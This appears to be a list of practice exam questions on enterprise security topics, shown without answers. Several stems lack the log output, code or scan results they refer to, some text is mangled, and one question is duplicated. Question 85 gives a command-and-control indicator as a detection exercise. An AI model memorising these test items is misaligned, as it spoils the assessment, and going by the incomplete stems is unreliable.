EMT Practice Test

1. Question Content...


Question List

Question1: During a review of events, a security analyst notes that several log entries from the FIM system identify changes to firewall rule sets. While coordinating a response to the FIM entries, the analyst receives alerts from the DLP system that indicate an employee is sending sensitive data to an external email address. Which of the following would be the most relevant to review in order to gain a better understanding of whether these events are associated with an attack?

Question2: Which of the following industrial protocols is most likely to be found in public utility applications, such as water or electric?

Question3: A network security engineer is designing a three-tier web architecture that will allow a third-party vendor to perform the following audit functions within the organization's cloud environment:
- Review communication between all infrastructure endpoints
- Identify unauthorized and malicious data patterns
- Perform automated, risk-mitigating configuration changes
Which of the following should the network security engineer include in the design to address these requirements?

Question4: To bring digital evidence in a court of law, the evidence must be:

Question5: A technology company developed an in-house chat application that is used only by developers.
An open-source library within the application has been deprecated. The facts below are provided:
- The cost of replacing this system is nominal.
- The system provides no revenue to the business.
- The system is not a critical part of the business.
Which of the following is the best risk mitigation strategy?

Question6: Which of the following is record-level encryption commonly used to do?

Question7: A security architect was asked to modify an existing internal network design to accommodate the following requirements for RDP:
- Enforce MFA for RDP.
- Ensure RDP connections are only allowed with secure ciphers.
The existing network is extremely complex and not well segmented. Because of these limitations, the company has requested that the connections not be restricted by network-level firewalls or ACLs.
Which of the following should the security architect recommend to meet these requirements?

Question8: A security engineer is implementing DLP. Which of the following should the security engineer include in the overall DLP strategy?

Question9: A security engineer is trying to identify instances of a vulnerability in an internally developed line of business software. The software is hosted at the company's internal data center. Although a standard vulnerability definition does not exist, the identification and remediation results should be tracked in the company's vulnerability management system. Which of the following should the engineer use to identify this vulnerability?

Question10: A security analyst is trying to identify the source of a recent data loss incident. The analyst has reviewed all the for the time surrounding the identified all the assets on the network at the time of the data loss. The analyst suspects the key to finding the source was obfuscated in an application. Which of the following tools should the analyst use NEXT?

Question11: A company has integrated source code from a subcontractor into its security product. The subcontractor is located in an adversarial country and has informed the company of a requirement to escrow the source code with the subcontractor's government. Which of the following is a potential security risk arising from this situation?

Question12: A company wants to prevent a partner company from denying agreement to a transaction. Which of the following is the best solution for the company?

Question13: An enterprise is configuring an SSL client-based VPN for certificate authentication.
The trusted root certificate from the CA is imported into the firewall, and the VPN configuration in the firewall is configured for certificate authentication.
Signed certificates from the trusted CA are distributed to user devices. The CA certificate is set as trusted on the end-user devices, and the VPN client is configured on the end-user devices.
When the end users attempt to connect however, the firewall rejects the connection after a brief period.
Which of the following is the MOST likely reason the firewall rejects the connection?

Question14: An organization recently started processing, transmitting, and storing its customers' credit card information. Within a week of doing so, the organization suffered a massive breach that resulted in the exposure of the customers' information.
Which of the following provides the BEST guidance for protecting such information while it is at rest and in transit?

Question15: A software developer created an application for a large, multinational company. The company is concerned the program code could be reverse engineered by a foreign entity and intellectual property would be lost. Which of the following techniques should be used to prevent this situation?

Question16: In support of disaster recovery objectives, a third party agreed to provide 99.999% uptime.
Recently, a hardware failure impacted a firewall without service degradation. Which of the following resiliency concepts was most likely in place?

Question17: A remote user reports the inability to authenticate to the VPN concentrator.
During troubleshooting, a security administrate captures an attempted authentication and discovers the following being presented by the user's VPN client:

Which of the following BEST describes the reason the user is unable to connect to the VPN service?

Question18: A company has instituted a new policy in which all outbound traffic must go over TCP ports 80 and 443 for all its managed mobile devices. No other IP traffic is allowed to be initiated from a device. Which of the following should the organization consider implementing to ensure internet access continues without interruption?

Question19: A financial institution has several that currently employ the following controls:
- The severs follow a monthly patching cycle.
- All changes must go through a change management process.
- Developers and systems administrators must log into a jumpbox to
access the servers hosting the data using two-factor authentication.
- The servers are on an isolated VLAN and cannot be directly accessed
from the internal production network.
An outage recently occurred and lasted several days due to an upgrade that circumvented the approval process. Once the security team discovered an unauthorized patch was installed, they were able to resume operations within an hour. Which of the following should the security administrator recommend to reduce the time to resolution if a similar incident occurs in the future?

Question20: A financial services company has proprietary trading algorithms, which were created and are maintained by a team of developers on their private source code repository.
If the details of this operation became known to competitors, the company's ability to profit from its trading would disappear immediately.
Which of the following would the company MOST likely use to protect its trading algorithms?

Question21: An auditor Is reviewing the logs from a web application to determine the source of an Incident.
The web application architecture Includes an Internet-accessible application load balancer, a number of web servers In a private subnet, application servers, and one database server In a tiered configuration. The application load balancer cannot store the logs. The following are sample log snippets:

Which of the following should the auditor recommend to ensure future incidents can be traced back to the sources?

Question22: Which of the following is required for an organization to meet the ISO 27018 standard?

Question23: A company uses an enterprise desktop imaging solution to manage deployment of its desktop computers. Desktop computer users are only permitted to use software that is part of the baseline image. Which of the following technical solutions was MOST likely deployed by the company to ensure only known-good software can be installed on corporate desktops?

Question24: A company is migrating its data center to the cloud. Some hosts had been previously isolated, but a risk assessment convinced the engineering team to reintegrate the systems. Because the systems were isolated, the risk associated with vulnerabilities was low. Which of the following should the security team recommend be performed before migrating these servers to the cloud?

Question25: A hospitality company experienced a data breach that included customer PII. The hacker used social engineering to convince an employee to grant a third-party application access to some company documents within a cloud file storage service Which of the following is the BEST solution to help prevent this type of attack in the future?

Question26: A security technician is trying to connect a remote site to the central office over a site-to-site VPN.
The technician has verified the source and destination IP addresses are correct, but the technician is unable to get the remote site to connect. The following error message keeps repeating:
"An error has occurred during Phase 1 handshake. Deleting keys and
retrying..."
Which of the following is most likely the reason the connection is failing?

Question27: An engineering team has deployed a new VPN service that requires client certificates to be used in order to successfully connect. On iOS devices, however, the following error occurs after importing the .p12 certificate file:
mbedTLS: ca certificate is undefined
Which of the following is the root cause of this issue?

Question28: A new requirement for legislators has forced a government security team to develop a validation process to verify the integrity of a downloaded file and the sender of the file. Which of the following is the BEST way for the security team to comply with this requirement?

Question29: A risk assessment determined that company data was leaked to the general public during a migration. Which of the following best explains the root cause of this issue?

Question30: A client is adding scope to a project. Which of the following processes should be used when requesting updates or corrections to the client's systems?

Question31: Which of the following technologies would benefit the most from the use of biometric readers, proximity badge entry systems, and the use of hardware security tokens to access various environments and data entry systems?

Question32: A MSSP has taken on a large client that has government compliance requirements. Due to the sensitive nature of communications to its aerospace partners, the MSSP must ensure that all communications to and from the client web portal are secured by industry-standard asymmetric encryption methods. Which of the following should the MSSP configure to BEST meet this objective?

Question33: Which of the following represents the MOST significant benefit of implementing a passwordless authentication solution?

Question34: A security review of the architecture for an application migration was recently completed. The following observations were made:
- External inbound access is blocked.
- A large amount of storage is available.
- Memory and CPU usage are low.
- The load balancer has only a single server assigned.
- Multiple APIs are integrated.
Which of the following needs to be addressed?

Question35: A security architect is analyzing an old application that is not covered for maintenance anymore because the software company is no longer in business. Which of the following techniques should have been implemented to prevent these types of risks?

Question36: A company would like to move its payment card data to a cloud provider. Which of the following solutions will best protect account numbers from unauthorized disclosure?

Question37: After a security incident, a network security engineer discovers that a portion of the company's sensitive external traffic has been redirected through a secondary ISP that is not normally used.
Which of the following would BEST secure the routes while allowing the network to function in the event of a single provider failure?

Question38: A security analyst has concerns about malware on an endpoint. The malware is unable to detonate by modifying the kernel response to various system calls. As a test, the analyst modifies a Windows server to respond to system calls as if it was a Linux server. In another test, the analyst modifies the operating system to prevent the malware from identifying target files. Which of the following techniques is the analyst MOST likely using?

Question39: A security administrator is opening connectivity on a firewall between Organization A and Organization B Organization B just acquired Organization A.
Which of the following risk mitigation strategies should the administrator implement to reduce the risk involved with this change?

Question40: A security administrator needs to recommend an encryption protocol after a legacy stream cipher was deprecated when a security flaw was discovered. The legacy cipher excelled at maintaining strong cryptographic security and provided great performance for a streaming video service.
Which of the following AES modes should the security administrator recommend given these requirements?

Question41: A software assurance analyst reviews an SSH daemon's source code and sees the following:

Based on this code snippet, which of the following attacks is MOST likely to succeed?

Question42: A common industrial protocol has the following characteristics:
- Provides for no authentication/security
- Is often implemented in a client/server relationship
- Is implemented as either RTU or TCP/IP
Which of the following is being described?

Question43: An attacker has been compromising banking institution targets across a regional area.
The Chief Information Security Officer (CISO) at a local bank wants to detect and prevent an attack before the bank becomes a victim.
Which of the following actions should the CISO take?

Question44: Following a Log4j outbreak, several network appliances were not managed and remained undetected despite an application inventory system being in place. Which of the following solutions should the security director recommend to best understand the composition of applications on unmanaged devices?

Question45: A developer implement the following code snippet.
catch (Exception e)
{
if (log.isDebugEnabled())
{
log.debug (''Caught InvalidGSMException Exception
+ e.toString ());
}
}
Which of the following vulnerabilities does the code snippet resolve?

Question46: A company wants to quantify and communicate the effectiveness of its security controls but must establish measures. Which of the following is MOST likely to be included in an effective assessment roadmap for these controls?

Question47: Ann, a security manager, is reviewing a threat feed that provides information about attacks that allow a malicious user to gain access to private contact lists. Ann receives a notification that the vulnerability can be exploited within her environment. Given this information, Ann can anticipate an increase in:

Question48: A DevOps team has deployed databases, event-driven services, and an API gateway as PaaS solution that will support a new billing system.
Which of the following security responsibilities will the DevOps team need to perform?

Question49: An organization's existing infrastructure includes site-to-site VPNs between datacenters. In the past year, a sophisticated attacker exploited a zero-day vulnerability on the VPN concentrator.
Consequently, the Chief Information Security Officer (CISO) is making infrastructure changes to mitigate the risk of service loss should another zero-day exploit be used against the VPN solution.
Which of the following designs would be BEST for the CISO to use?

Question50: The Chief information Officer (CIO) wants to establish a non-banding agreement with a third party that outlines the objectives of the mutual arrangement dealing with data transfers between both organizations before establishing a format partnership.
Which of the follow would MOST likely be used?

Question51: During a recent security incident investigation, a security analyst mistakenly turned off the infected machine prior to consulting with a forensic analyst. Upon rebooting the machine, a malicious script that was running as a background process was no longer present. As a result, potentially useful evidence was lost. Which of the following should the security analyst have followed?

Question52: A security engineer is troubleshooting an issue in which an employee is getting an IP address in the range on the wired network. The engineer plus another PC into the same port, and that PC gets an IP address in the correct range. The engineer then puts the employee' PC on the wireless network and finds the PC still not get an IP address in the proper range. The PC is up to date on all software and antivirus definitions, and the IP address is not an APIPA address. Which of the following is MOST likely the problem?

Question53: A security architect works for a manufacturing organization that has many different branch offices.
The architect is looking for a way to reduce traffic and ensure the branch offices receive the latest copy of revoked certificates issued by the CA at the organization's headquarters location. The solution must also have the lowest power requirement on the CA.
Which of the following is the BEST solution?

Question54: A company is outsourcing to an MSSP that performs managed detection and response services.
The MSSP requires a server to be placed inside the network as a log aggregate and allows remote access to MSSP analyst. Critical devices send logs to the log aggregator, where data is stored for 12 months locally before being archived to a multitenant cloud. The data is then sent from the log aggregate to a public IP address in the MSSP datacenter for analysis. A security engineer is concerned about the security of the solution and notes the following.
- The critical devise send cleartext logs to the aggregator.
- The log aggregator utilize full disk encryption.
- The log aggregator sends to the analysis server via port 80.
- MSSP analysis utilize an SSL VPN with MFA to access the log
aggregator remotely.
- The data is compressed and encrypted prior to being achieved in the
cloud.
Which of the following should be the engineer's GREATEST concern?

Question55: The Chief information Officer (CIO) asks the system administrator to improve email security at the company based on the following requirements:
- Transaction being requested by unauthorized individuals.
- Complete discretion regarding client names, account numbers, and
investment information.
- Malicious attackers using email to malware and ransomeware.
- Exfiltration of sensitive company information.
The cloud-based email solution will provide anti-malware reputation-based scanning, signature- based scanning, and sandboxing.
Which of the following is the BEST option to resolve the boar's concerns for this email migration?

Question56: A company is deploying a DIP solution and scanning workstations and network drives for documents that contain potential Pll and payment card data. The results of the first scan are as follows:

The security learn is unable to identify the data owners for the specific files in a timely manner and does not suspect malicious activity with any of the detected files.
Which of the following would address the inherent risk until the data owners can be formally identified?

Question57: An enterprise's Chief Technology Officer (CTO) and Chief Information Security Officer (CISO) are meeting to discuss ongoing capacity and resource planning issues. The enterprise has experienced rapid, massive growth over the last 12 months, and the technology department is stretched thin for resources. A new accounting service is required to support the enterprise's growth, but the only available compute resources that meet the accounting service requirements are on the virtual platform, which is hosting the enterprise's website.
Which of the following should the CISO be MOST concerned about?

Question58: A security analyst has been assigned incident response duties and must instigate the response on a Windows device that appears to be compromised.
Which of the following commands should be executed on the client FIRST?

Question59: The general counsel at an organization has received written notice of upcoming litigation. The general counsel has issued a legal records hold. Which of the following actions should the organization take to comply with the request?

Question60: A company is concerned about disgruntled employees transferring its intellectual property data through covert channels.
Which of the following tools would allow employees to write data into ICMP echo response packets?

Question61: A new, online file hosting service is being offered. The service has the following security requirements:
- Threats to customer data integrity and availability should be
remediated first.
- The environment should be dynamic to match increasing customer
demands.
- The solution should not interfere with customers' ability to access
their data at anytime.
- Security analysts should focus on high-risk items.
Which of the following would BEST satisfy the requirements?

Question62: A threat hunting team receives a report about possible APT activity in the network. Which of the following threat management frameworks should the team implement?

Question63: The Chief information Officer (CIO) of a large bank, which uses multiple third-party organizations to deliver a service, is concerned about the handling and security of customer data by the parties.
Which of the following should be implemented to BEST manage the risk?

Question64: An organization is prioritizing efforts to remediate or mitigate risks identified during the latest assessment. For one of the risks, a full remediation was not possible, but the organization was able to successfully apply mitigations to reduce the likelihood of impact.
Which of the following should the organization perform NEXT?

Question65: A security analyst is monitoring an organization's IDS and DLP systems for an alert indicating files were removed from the network. The files were from the workstation of an employee who was authenticated but not authorized to access the files. Which of the following should the organization do FIRST to address this issue?

Question66: An employee's device was missing for 96 hours before being reported. The employee called the help desk to ask for another device. Which of the following phases of the incident response cycle needs improvement?

Question67: A security auditor needs to review the manner in which an entertainment device operates. The auditor is analyzing the output of a port scanning tool to determine the next steps in the security review. Given the following log output.
The best option for the auditor to use NEXT is:

Question68: A security engineer needs to implement a CASB to secure employee user web traffic. A key requirement is that the relevant event data must be collected from existing on-premises infrastructure components and consumed by the CASB to expand traffic visibility. The solution must be highly resilient to network outages.
Which of the following architectural components would BEST meet these requirements?

Question69: Which of the following is the BEST disaster recovery solution when resources are running in a cloud environment?

Question70: A business wants to migrate its workloads from an exclusively on-premises IT infrastructure to the cloud but cannot implement all the required controls. Which of the following BEST describes the risk associated with this implementation?

Question71: A security engineer has recently become aware of a Java application that processes critical information in real time on the company's network. The Java application was scanned with SAST prior to deployment, and all vulnerabilities have been mitigated. However, some known issues within the Java runtime environment cannot be resolved. Which of the following should the security engineer recommend to the developer in order to mitigate the issue with the LEAST amount of downtime?

Question72: A security administrator at a global organization wants to update password complexity rules for a system containing personally identifiable information. Which of the following would be the best resource for this information?

Question73: A security architect updated the security policy to require a proper way to verify that packets received between two parties have not been tampered with and the connection remains private.
Which of the following cryptographic techniques can be used to ensure the security policy is being enforced properly?

Question74: A user from the sales department opened a suspicious file attachment. The sales department then contacted the SOC to investigate a number of unresponsive systems, and the team successfully identified the file and the origin of the attack.
Which of the following is the NEXT step of the incident response plan?

Question75: A security analyst is concerned that a malicious piece of code was downloaded on a Linux system. After some research, the analyst determines that the suspected piece of code is performing a lot of input/output (I/O) on the disk drive.

Based on the output above, from which of the following process IDs can the analyst begin an investigation?

Question76: A company based in the United States holds insurance details of EU citizens.
Which of the following must be adhered to when processing EU citizens' personal, private, and confidential data?

Question77: A forensic investigator started the process of gathering evidence on a laptop in response to an incident. The investigator took a snapshot of the hard drive, copied relevant log files, and then performed a memory dump. Which of the following steps in the process should have occurred FIRST?

Question78: A security analyst received a report that a suspicious flash drive was picked up in the office's waiting area, located beyond the secured door. The analyst investigated the drive and found malware designed to harvest and transmit credentials. Security cameras in the area where the flash drive was discovered showed a vendor representative dropping the drive. Which of the following should the analyst recommend as an additional way to identify anyone who enters the building, in the event the camera system fails?

Question79: A host on a company's network has been infected by a worm that appears to be spreading via SMB. A security analyst has been tasked with containing the incident while also maintaining evidence for a subsequent investigation and malware analysis.
Which of the following steps would be best to perform FIRST?

Question80: A software development company wants to ensure that users can confirm the software is legitimate when installing it. Which of the following is the best way for the company to achieve this security objective?

Question81: An organization offers SaaS services through a public email and storage provider. To facilitate password resets, a simple online system is set up. During a routine check of the storage each month, a significant increase in use of storage can be seen. Which of the following techniques would remediate the attack?

Question82: A company has identified a number of vulnerable, end-of-support systems with limited defensive capabilities. Which of the following would be the first step in reducing the attack surface in this environment?

Question83: PKI can be used to support security requirements in the change management process. Which of the following capabilities does PKI provide for messages?

Question84: A smart switch has the ability to monitor electrical levels and shut off power to a building in the event of power surge or other fault situation. The switch was installed on a wired network in a hospital and is monitored by the facilities department via a cloud application. The security administrator isolated the switch on a separate VLAN and set up a patching routine. Which of the following steps should also be taken to harden the smart switch?

Question85: A systems administrator was given the following IOC to detect the presence of a malicious piece of software communicating with its command-and-control server:
POST /malicious.php
User-Agent: Malicious Tool V 1.0
Host: www.malicious.com
The IOC documentation suggests the URL is the only part that could change. Which of the following regular expressions would allow the systems administrator to determine if any of the company hosts are compromised, while reducing false positives?

Question86: A company publishes several APIs for customers and is required to use keys to segregate customer data sets.
Which of the following would be BEST to use to store customer keys?

Question87: During a recent breach, an attacker was able to get a user's login credentials by cracking a password that was retrieved via a stolen laptop. The attacker accessed the hashed passwords from the hard drive when it was connected to another device. Which of the following security measures could have helped prevent this account from being compromised?

Question88: All staff at a company have started working remotely due to a global pandemic. To transition to remote work, the company has migrated to SaaS collaboration tools. The human resources department wants to use these tools to process sensitive information but is concerned the data could be:
- Leaked to the media via printing of the documents
- Sent to a personal email address
- Accessed and viewed by systems administrators
- Uploaded to a file storage site
Which of the following would mitigate the department's concerns?

Question89: A security architect is implementing a SOAR solution in an organization's cloud production environment to support detection capabilities. Which of the following will be the most likely benefit?

Question90: Which of the following communication protocols is used to create PANs with small, low-power digital radios and supports a large number of nodes?

Question91: A security engineer is performing a threat modeling procedure against a machine learning system that correlates analytic information for decision support. Which of the following threat statements most likely applies to this type of system?

Question92: Leveraging cryptographic solutions to protect data that is in use ensures the data is encrypted:

Question93: A software developer has been tasked with creating a unique threat detection mechanism that is based on machine learning. The information system for which the tool is being developed is on a rapid CI/CD pipeline, and the tool developer is considered a supplier to the process. Which of the following presents the most risk to the development life cycle and to the ability to deliver the security tool on time?

Question94: A systems administrator at a web-hosting provider has been tasked with renewing the public certificates of all customer sites. Which of the following would BEST support multiple domain names while minimizing the amount of certificates needed?

Question95: A security analyst is evaluating all third-party software an organization uses. The analyst discovers that each department is violating the organization's policy by provisioning access to SaaS products without oversight from the security group and without using a centralized access control methodology. Which of the following should the organization use to enforce its SaaS product access requirements?

Question96: A company is migrating from company-owned phones to a BYOD strategy for mobile devices.
The pilot program will start with the executive management team and be rolled out to the rest of the staff in phases. The company's Chief Financial Officer loses a phone multiple times a year.
Which of the following will MOST likely secure the data on the lost device?

Question97: A company is rewriting a vulnerable application and adding the mprotect() system call in multiple parts of the application's code that was being leveraged by a recent exploitation tool. Which of the following should be enabled to ensure the application can leverage the new system call against similar attacks in the future?

Question98: A company makes consumer health devices and needs to maintain strict confidentiality of unreleased product designs.
Recently unauthorized photos of products still in development have been for sale on the dark web.
The Chief Information Security Officer (CISO) suspects an insider threat, but the team that uses the secret outdoor testing area has been vetted many times and nothing suspicious has been found.
Which of the following is the MOST likely cause of the unauthorized photos?

Question99: A security analyst at a global financial firm was reviewing the design of a cloud-based system to identify opportunities to improve the security of the architecture. The system was recently involved in a data breach after a vulnerability was exploited within a virtual machine's operating system. The analyst observed the VPC in which the system was located was not peered with the security VPC that contained the centralized vulnerability scanner due to the cloud provider's limitations. Which of the following is the BEST course of action to help prevent this situation in the near future?

Question100: Ann, a retiring employee, cleaned out her desk. The next day, Ann's manager notices company equipment that was supposed to remain at her desk is now missing.
Which of the following would reduce the risk of this occurring in the future?

Question101: A company's SOC has received threat intelligence about an active campaign utilizing a specific vulnerability. The company would like to determine whether it is vulnerable to this active campaign. Which of the following should the company use to make this determination?

Question102: A law firm experienced a breach in which access was gained to a secure server. During an investigation to determine how the breach occurred, an employee admitted to clicking on a spear- phishing link. A security analyst reviewed the event logs and found the following:
- PAM had not been bypassed.
- DLP did not trigger any alerts.
- The antivirus was updated to the most current signatures.
Which of the following MOST likely occurred?

Question103: A software developer was just informed by the security team that the company's product has several vulnerabilities. Most of these vulnerabilities were traced to code the developer did not write. The developer does not recognize some of the code, as it was in the software before the developer started on the program and is not tracked for licensing purposes. Which of the following would the developer MOST likely do to mitigate the risks and prevent further issues like these from occurring?

Question104: An engineer has had scaling issues with a web application hosted on premises and would like to move to a serverless architecture. Which of the following cloud benefits would be best to utilize for this project?

Question105: A digital forensics expert has obtained an ARM binary suspected of including malicious behavior.
The expert would like to trace and analyze the ARM binary's execution. Which of the following tools would BEST support this effort?

Question106: A new corporate policy requires that all employees have access to corporate resources on personal mobile devices.
The information assurance manager is concerned about the potential for inadvertent and malicious data disclosure if a device is lost, while users are concerned about corporate overreach.
Which of the following controls would address these concerns and should be reflected in the company's mobile device policy?

Question107: A security engineer is working to secure an organization's VMs. While reviewing the workflow for creating VMs on demand, the engineer raises a concern about the integrity of the secure boot process of the VM guest.
Which of the following would BEST address this concern?

Question108: Which of the following security features do email signatures provide? (Choose two.)

Question109: An investigator is attempting to determine if recent data breaches may be due to issues with a company's web server that offers news subscription services. The investigator has gathered the following data:
- Clients successfully establish TLS connections to web services
provided by the server.
- After establishing the connections, most client connections are
renegotiated.
- The renegotiated sessions use cipher suite TLS_RSA_WITH_NULL_SHA.
Which of the following is the MOST likely root cause?

Question110: An analyst has prepared several possible solutions to a successful attack on the company. The solutions need to be implemented with the LEAST amount of downtime. Which of the following should the analyst perform?

Question111: A partner organization is requesting that a security administrator exchange S/MIME certificates for email between the two organizations. The partner organization is most likely trying to:

Question112: Company A acquired Company B. During an audit, a security engineer found Company B's environment was inadequately patched. In response, Company A placed a firewall between the two environments until Company B's infrastructure could be integrated into Company A's security program.
Which of the following risk-handling techniques was used?

Question113: A cybersecurity analyst receives a ticket that indicates a potential incident is occurring. There has been a large in log files generated by a generated by a website containing a `'Contact US'' form.
The analyst must determine if the increase in website traffic is due to a recent marketing campaign of if this is a potential incident. Which of the following would BEST assist the analyst?

Question114: Drag and Drop Question
An organization is planning for disaster recovery and continuity of operations.
INSTRUCTIONS
Review the following scenarios and instructions. Match each relevant finding to the affected host.
After associating scenario 3 with the appropriate host(s), click the host to select the appropriate corrective action for that finding.
Each finding may be used more than once.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Question115: A PaaS provider deployed a new product using a DevOps methodology.
Because DevOps is used to support both development and production assets inherent separation of duties is limited.
To ensure compliance with security frameworks that require a specific set of controls relating to separation of duties the organization must design and implement an appropriate compensating control.
Which of the following would be MOST suitable in this scenario?

Question116: A cybersecurity analyst discovered a private key that could have been exposed.
Which of the following is the BEST way for the analyst to determine if the key has been compromised?

Question117: The management team at a company with a large, aging server environment is conducting a server risk assessment in order to create a replacement strategy. The replacement strategy will be based upon the likelihood a server will fail, regardless of the criticality of the application running on a particular server. Which of the following should be used to prioritize the server replacements?

Question118: A forensic expert working on a fraud investigation for a US-based company collected a few disk images as evidence.
Which of the following offers an authoritative decision about whether the evidence was obtained legally?

Question119: Law enforcement officials informed an organization that an investigation has begun. Which of the following is the FIRST step the organization should take?

Question120: As part of the asset management life cycle, a company engages a certified equipment disposal vendor to appropriately recycle and destroy company assets that are no longer in use. As part of the company's vendor due diligence, which of the following would be MOST important to obtain from the vendor?

Question121: A security analyst is reviewing the following output from a vulnerability scan of an organization's internet-facing web services:
- Line 06: Hostname sent via SNI does not match certificate.
- Line 10: Certificate not validated by OCSP.
- Line 13: Weak SHA-1 signature algorithm detected.
- Line 17: TLS 1.2 cipher suite negotiated.
- Line 18: SSL session not using forward secrecy.
Which of the following indicates a susceptibility whereby an attacker can take advantage of the trust relationship between the client and the server?

Question122: An organization's hunt team thinks a persistent threats exists and already has a foothold in the enterprise network.
Which of the following techniques would be BEST for the hunt team to use to entice the adversary to uncover malicious activity?

Question123: Given the following log snippet from a web server:

Which of the following BEST describes this type of attack?

Question124: Which of the following terms refers to the delivery of encryption keys to a CASB or a third-party entity?

Question125: A security architect needs to implement a CASB solution for an organization with a highly distributed remote workforce. One Of the requirements for the implementation includes the capability to discover SaaS applications and block access to those that are unapproved or identified as risky. Which of the following would BEST achieve this objective?

Question126: A cybersecurity analyst discovered a private key that could have been exposed.
Which of the following is the BEST way for the analyst to determine if the key has been compromised?

Question127: A customer requires secure communication of subscribed web services at all times, but the company currently signs its own certificate requests to an internal CA.
Which of the following approaches will best meet the customer's requirements?

Question128: A company hosts a large amount of data in blob storage for its customers. The company recently had a number of issues with this data being prematurely deleted before the scheduled backup processes could be completed. The management team has asked the security architect for a recommendation that allows blobs to be deleted occasionally, but only after a successful backup.
Which of the following solutions will BEST meet this requirement?

Question129: A corporation discovered its internet connection is saturated with traffic originating from multiple IP addresses across the internet. A security analyst needs to find a solution to address future occurrences of this type of attack.
Which of the following would be the BEST solution to meet this goal?

Question130: A cloud security engineer is setting up a cloud-hosted WAF. The engineer needs to implement a solution to protect the multiple websites the organization hosts. The organization websites are:
- www.mycompany.org
- www.mycompany.com
- campus.mycompany.com
- wiki.mycompany.org
The solution must save costs and be able to protect all websites. Users should be able to notify the cloud security engineer of any on-path attacks. Which of the following is the best solution?

Question131: Due to locality and budget constraints, an organization's satellite office has a lower bandwidth allocation than other offices in the organization. As a result, the local security infrastructure staff is assessing architectural options that will help preserve network bandwidth and increase speed to both internal and external resources while not sacrificing threat visibility. Which of the following would be the BEST option to implement?

Question132: A Chief Information Officer is considering migrating all company data to the cloud to save money on expensive SAN storage.
Which of the following is a security concern that will MOST likely need to be addressed during migration?

Question133: A small business requires a low-cost approach to theft detection for the audio recordings it produces and sells.
Which of the following techniques will MOST likely meet the business's needs?

Question134: A security analyst needs to recommend a remediation to the following threat:

Which of the following actions should the security analyst propose to prevent this successful exploitation?

Question135: A security analyst runs a vulnerability scan on a network administrator's workstation. The network administrator has direct administrative access to the company's SSO web portal. The vulnerability scan uncovers critical vulnerabilities with equally high CVSS scores for the user's browser, OS, email client, and an offline password manager. Which of the following should the security analyst patch FIRST?

Question136: In comparison to other types of alternative processing sites that may be invoked as a part of disaster recovery, cold sites are different because they:

Question137: An internal security audit determines that Telnet is currently being used within the environment to manage network switches. Which of the following tools should be utilized to identify credentials in plaintext that are used to log in to these devices?

Question138: The OS on several servers crashed around the same time for an unknown reason. The servers were restored to working condition, and all file integrity was verified. Which of the following should the incident response team perform to understand the crash and prevent it in the future?

Question139: A security engineer is reviewing metrics for a series of bug bounty reports. The engineer finds systematic cross-site scripting issues and unresolved previous findings. Which of the following is the best solution to address the issue?

Question140: An ASIC manufacturer wishing to best reduce downstream supply chain risk can provide validation instructions for consumers that:

Question141: The CI/CD pipeline requires code to have close to zero defects and zero vulnerabilities. The current process for any code releases into production uses two-week Agile sprints. Which of the following would BEST meet the requirement?

Question142: During a recent incident, sensitive data was disclosed and subsequently destroyed through a properly secured, cloud-based storage platform. An incident response technician is working with management to develop an after action report that conveys critical metrics regarding the incident.
Which of the following would be MOST important to senior leadership to determine the impact of the breach?

Question143: A SIEM generated an alert after a third-party database administrator, who had recently been granted temporary access to the repository, accessed business-sensitive content in the database.
The SIEM had generated similar alerts before this incident. Which of the following best explains the cause of the alert?

Question144: Which of the following BEST sets expectation between the security team and business units within an organization?

Question145: Application owners are reporting performance issues with traffic using port 1433 from the cloud environment. A security administrator has various pcap files to analyze the data between the related source and destination servers. Which of the following tools should be used to help troubleshoot the issue?

Question146: A small business would like to provide guests who are using mobile devices encrypted WPA3 access without first distributing PSKs or other credentials. Which of the following features will enable the business to meet this objective?

Question147: A security engineer was auditing an organization's current software development practice and discovered that multiple open-source libraries were Integrated into the organization's software.
The organization currently performs SAST and DAST on the software it develops.
Which of the following should the organization incorporate into the SDLC to ensure the security of the open-source libraries?

Question148: An organization is assessing the security posture of a new SaaS CRM system that handles sensitive Pll and identity information, such as passport numbers. The SaaS CRM system does not meet the organization's current security standards. The assessment identifies the following:
1) There will be a $20,000 per day revenue loss for each day the system is delayed going into production.
2) The inherent risk is high.
3) The residual risk is low.
4) There will be a staged deployment to the solution rollout to the contact center.
Which of the following risk-handling techniques will BEST meet the organization's requirements?

Question149: After an employee was terminated, the company discovered the employee still had access to emails and attached content that should have been destroyed during the off-boarding. The employee's laptop and cell phone were confiscated and accounts were disabled promptly.
Forensic investigation suggests the company's DLP was effective, and the content in QUESTION
2was not sent outside of work or transferred to removable media. Personality owned devices are not permitted to access company systems or information.
Which of the following would be the MOST efficient control to prevent this from occurring in the future?

Question150: An organization is implementing a new identity and access management architecture with the following objectives:
- Supporting MFA against on-premises infrastructure
- Improving the user experience by integrating with SaaS applications
- Applying risk-based policies based on location
- Performing just-in-time provisioning
Which of the following authentication protocols should the organization implement to support these requirements?

Question151: A security architect discovers the following page while testing a website for vulnerabilities:
404 - page not found: /gy67162
The page you have requested is no. avai.able on .his server.
Apache Tomcat 7.0.52
Which of the following best describes why this issue should be corrected?

Question152: Company A is establishing a contractual with Company B. The terms of the agreement are formalized in a document covering the payment terms, limitation of liability, and intellectual property rights. Which of the following documents will MOST likely contain these elements

Question153: An organization's threat team is creating a model based on a number of incidents in which systems in an air-gapped location are compromised. Physical access to the location and logical access to the systems are limited to administrators and select, approved, on-site company employees. Which of the following is the BEST strategy to reduce the risks of data exposure?

Question154: A health company has reached the physical and computing capabilities in its datacenter, but the computing demand continues to increase. The infrastructure is fully virtualized and runs custom and commercial healthcare application that process sensitive health and payment information.
Which of the following should the company implement to ensure it can meet the computing demand while complying with healthcare standard for virtualization and cloud computing?

Question155: A networking team asked a security administrator to enable Flash on its web browser. The networking team explained that an important legacy embedded system gathers SNMP information from various devices. The system can only be managed through a web browser running Flash. The embedded system will be replaced within the year but is still critical at the moment.
Which of the following should the security administrator do to mitigate the risk?

Question156: A product manager is concerned about the unintentional sharing of the company's intellectual property through employees' use of social media. Which of the following would BEST mitigate this risk?

Question157: A security engineer investigates an incident and determines that a rogue device is on the network. Further investigation finds that an employee's personal device has been set up to access company resources and does not comply with standard security controls. Which of the following should the security engineer recommend to reduce the risk of future reoccurrence?

Question158: A recent data breach revealed that a company has a number of files containing customer data across its storage environment. These files are individualized for each employee and are used in tracking various customer orders, inquiries, and issues. The files are not encrypted and can be accessed by anyone. The senior management team would like to address these issues without interrupting existing processes.
Which of the following should a security architect recommend?

Question159: A security engineer needs to implement a cost-effective authentication scheme for a new web- based application that requires:
